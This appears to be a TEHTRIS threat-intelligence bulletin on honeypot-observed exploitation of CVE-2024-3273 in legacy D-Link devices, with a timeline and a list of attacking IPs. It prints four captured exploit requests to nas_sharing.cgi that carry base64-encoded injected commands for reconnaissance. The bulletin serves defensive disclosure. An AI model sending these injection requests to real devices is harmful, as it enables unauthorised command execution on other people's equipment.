The CVE-2024-3273 (CVSSv3: N/A) was disclosed on the 3rd of April. It refers to a command injection vulnerability in legacy D-Link routers.
The first exploit attempt of this vulnerability on one of our honeypots occurred on the 10th of April. But we recorded a spike in the number of attempts on the 16th of April. Of note, it was added on the 11th of April in CISA’s known exploited vulnerabilities catalog.
This illustrates how fast threat actors are covering very recent disclosed vulnerabilities in their cyber weapon arsenals. 130 unique IP addresses has tried to perform this exploit attempts againt our worldwide honeypot network targeting specifically the ones hosted in Europe equally on port TCP/80.
Our honeypots captured the following network packet:
GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1 Host: x.x.x.x:80
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1 Host: x.x.x.x:80
GET /.most/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1 Host: x.x.x.x:80
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHMJfAlncmVwCW15ZGxpbms= HTTP/1.1 Host: x.x.x.x:80
Top 10 of most active IP – all identified as malicious by public databases
- 103.245.236.120 – VN – AS 150867 (LP TECHNOLOGY ELECTRONIC COMMERCE COMPANY LIMITED)
- 80.94.92.60 – RO 🇷🇴 – AS 47890 (Unmanaged Ltd)
- 45.128.232.107 – NL 🇳🇱 – AS 51396 (Pfcloud UG)
- 91.215.85.61 – RU 🇷🇺 – AS 200593 (Prospero Ooo)
- 103.67.196.77 – VN 🇻🇳 – AS 135918 (VIET DIGITAL TECHNOLOGY LIABILITY COMPANY)
- 14.225.53.162 – VN 🇻🇳 – AS 135905 (VIETNAM POSTS AND TELECOMMUNICATIONS GROUP)
- 183.81.169.139 – NL 🇳🇱 – AS 206264 (Amarutu Technology Ltd)
- 93.123.85.66 – BG 🇧🇬 – AS 216240 (MortalSoft Ltd.)
- 39.97.209.211 – CN 🇨🇳- AS 37963 (Hangzhou Alibaba Advertising Co.,Ltd.)
- 116.198.40.76 – CN 🇨🇳 – AS 4808 ( China Unicom Beijing Province Network)
Information remain TEHTRIS sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.